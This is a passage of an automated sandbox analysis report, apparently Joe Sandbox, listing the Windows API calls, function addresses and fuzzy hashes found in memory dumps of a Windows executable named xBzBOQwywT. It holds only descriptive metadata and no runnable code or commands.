                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                        • String ID: KERNEL32.DLL$pI
                                                                        • API String ID: 637971194-197072765
                                                                        • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                        • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                                        • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                        • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove$_malloc
                                                                        • String ID:
APIs
• InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
• EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
• _memmove.LIBCMT ref: 0044B555
• _memmove.LIBCMT ref: 0044B578
• LeaveCriticalSection.KERNEL32(?), ref: 0044B587
• ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
• InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
Similarity
• API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
• String ID:
APIs
• ___set_flsgetvalue.LIBCMT ref: 0041523A
• __calloc_crt.LIBCMT ref: 00415246
• __getptd.LIBCMT ref: 00415253
• CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
• ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
• GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
• _free.LIBCMT ref: 0041529E
• __dosmaperr.LIBCMT ref: 004152A9
  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
Similarity
• API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
• String ID:
APIs
• VariantInit.OLEAUT32(?), ref: 0046C96E
  • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
  • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
Similarity
• API ID: Variant$Copy$ClearErrorInitLast
• String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 00465559
  • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
• inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
• gethostbyname.WSOCK32(?), ref: 004655A6
• GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
• _memmove.LIBCMT ref: 004656CA
• GlobalFree.KERNEL32(00000000), ref: 0046575C
• WSACleanup.WSOCK32 ref: 00465762
Similarity
• API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
• String ID:
APIs
• GetSystemMetrics.USER32(0000000F), ref: 00440527
• MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
• SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
• InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
• SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
• ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
• DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
Similarity
• API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
• String ID:
APIs
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
Similarity
• API ID: ConnectRegistry_memmove_wcslen
• String ID:
APIs
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
• _wcstok.LIBCMT ref: 004675B2
  • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
• _wcscpy.LIBCMT ref: 00467641
• GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
• _wcslen.LIBCMT ref: 00467793
• _wcslen.LIBCMT ref: 004677BD
  • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
• GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
Similarity
• API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
• String ID: X
APIs
  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
• Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
• MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
• AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
• LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
• CloseFigure.GDI32(?), ref: 0044751F
• SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
• Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
Similarity
• API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
• String ID:
                                                                        • API String ID: 4082120231-0
                                                                        • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                        • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                                                        • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                        • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                                                        APIs
                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                                                        • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                                        • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                                                        • String ID:
                                                                        • API String ID: 2027346449-0
                                                                        • Opcode ID: f0ceecdc90b01f2c9ddf0369269a16fa16a69f0e3d9f986347dd5438d1ccccc0
                                                                        • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                                                        • Opcode Fuzzy Hash: f0ceecdc90b01f2c9ddf0369269a16fa16a69f0e3d9f986347dd5438d1ccccc0
                                                                        • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                                                        APIs
                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                        • GetMenu.USER32 ref: 0047A703
                                                                        • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                                                        • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                                                        • _wcslen.LIBCMT ref: 0047A79E
                                                                        • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                                                        • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                                                        • String ID:
                                                                        • API String ID: 3257027151-0
                                                                        • Opcode ID: 80d25b5d47cdb8856cfd5c6f23c0a19e515c97fff049208cbae9d6eea43d64d6
                                                                        • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                                                        • Opcode Fuzzy Hash: 80d25b5d47cdb8856cfd5c6f23c0a19e515c97fff049208cbae9d6eea43d64d6
                                                                        • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                                                        APIs
                                                                        • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLastselect
                                                                        • String ID:
                                                                        • API String ID: 215497628-0
                                                                        • Opcode ID: 0902b8d125b16e906fbee135168885a915a185ebb0dc395c6f8acc5970aa3ebc
                                                                        • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                                                        • Opcode Fuzzy Hash: 0902b8d125b16e906fbee135168885a915a185ebb0dc395c6f8acc5970aa3ebc
                                                                        • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                                                        APIs
                                                                        • GetParent.USER32(?), ref: 0044443B
                                                                        • GetKeyboardState.USER32(?), ref: 00444450
                                                                        • SetKeyboardState.USER32(?), ref: 004444A4
                                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                        • String ID:
                                                                        • API String ID: 87235514-0
                                                                        • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                        • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                                                        • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                        • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                                                        APIs
                                                                        • GetParent.USER32(?), ref: 00444633
                                                                        • GetKeyboardState.USER32(?), ref: 00444648
                                                                        • SetKeyboardState.USER32(?), ref: 0044469C
                                                                        • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                                                        • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                                                        • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                                                        • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                        • String ID:
                                                                        • API String ID: 87235514-0
                                                                        • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                        • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                                                        • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                        • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                                                        • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                                                        • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                                                        • DeleteObject.GDI32(?), ref: 00455736
                                                                        • DeleteObject.GDI32(?), ref: 00455744
                                                                        • DestroyIcon.USER32(?), ref: 00455752
                                                                        • DestroyWindow.USER32(?), ref: 00455760
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                        • String ID:
                                                                        • API String ID: 2354583917-0
                                                                        • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                        • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                                                        • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                        • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                                                        APIs
                                                                        • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                                                        • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                                                        • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                                                        • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$Library$FreeLoad
                                                                        • String ID: Wu
                                                                        • API String ID: 2449869053-4083010176
                                                                        • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                        • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                                                        • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                        • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                        • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                                                        • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                        • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                                                        APIs
                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                                                        • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                                                        • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                        • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                        • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                        • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                        • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Enable$Show$MessageMoveSend
                                                                        • String ID:
                                                                        • API String ID: 896007046-0
                                                                        • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                        • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                                                        • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                        • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                                                        • GetFocus.USER32 ref: 00448ACF
                                                                        • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                        • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                        • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                        • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                        • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Enable$Show$FocusMessageSend
                                                                        • String ID:
                                                                        • API String ID: 3429747543-0
                                                                        • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                        • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                                                        • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                        • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                                        • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                                        • __swprintf.LIBCMT ref: 0045D4E9
                                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
